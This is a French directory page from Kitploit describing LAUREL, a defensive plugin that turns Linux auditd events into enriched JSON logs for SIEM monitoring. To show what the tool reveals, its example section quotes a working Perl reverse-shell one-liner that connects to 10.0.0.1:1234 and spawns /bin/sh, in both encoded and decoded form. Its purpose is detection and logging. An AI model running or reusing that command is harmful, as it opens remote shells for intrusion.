Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
laurel — Transformer les journaux d'audit Linux pour une utilisation SIEM | Kitploit
Outils/GitHubGitHub/threathunters-io/laurel
Outils DéfensifsAnalyse de Journaux
GitHubthreathunters-io/laurel

laurel

Transformer les journaux d'audit Linux pour une utilisation SIEM

Voir le dépôt
85165il y a 2 joursVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

logo

Audit Linux – Journalisation utilisable, robuste et simple

Build Status

LAUREL est un plugin de post-traitement d'événements pour auditd(8) qui génère des journaux d'audit JSON utiles et enrichis, adaptés aux configurations modernes de surveillance de sécurité.

La documentation correspondant à la dernière version stable se trouve ici.

Pourquoi ?

TLDR: Au lieu d'événements d'audit qui ressemblent à ceci…

root@kitploit:~
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…LAUREL les transforme en journaux JSON où le désordre que les attaquants/testeurs de pénétration/red teamers tentent de créer devient apparent au premier coup d'œil :

root@kitploit:~
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

Cela se produit à la source car LAUREL s'exécute sur l'hôte où les événements d'audit sont générés. Les événements sont enrichis avec des informations utiles sur le processus parent (ppid) :

root@kitploit:~
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Documentation

Les détails de configuration et d'exploitation sont décrits dans la page de manuel laurel(8). Les détails sur le format du journal et les justifications se trouvent dans la page de manuel laurel-about(7). La page laurel-audit-rules(7) contient des conseils et des exemples pour configurer des règles d'audit utiles pour détecter les tactiques des attaquants.

Les instructions d'installation de LAUREL contiennent des instructions pour compiler LAUREL à partir des sources et pour l'installer et le configurer.

Nous avons développé LAUREL car nous n'étions pas satisfaits des ensembles de fonctionnalités et des caractéristiques de performances des projets et produits existants. Veuillez vous référer au document Performance pour plus de détails.

Voir aussi

  • ansible-auditd-laurel, un rôle Ansible pour déployer auditd + laurel, par @0xFustang / CERT-EU

Licence

GNU General Public License, version 3

Auteurs

  • Hilko Bengen <[email protected]>
  • Sergej Schmidt <[email protected]>

Le logo a été créé par Birgit Meyer <[email protected]>.

Télécharger l’outil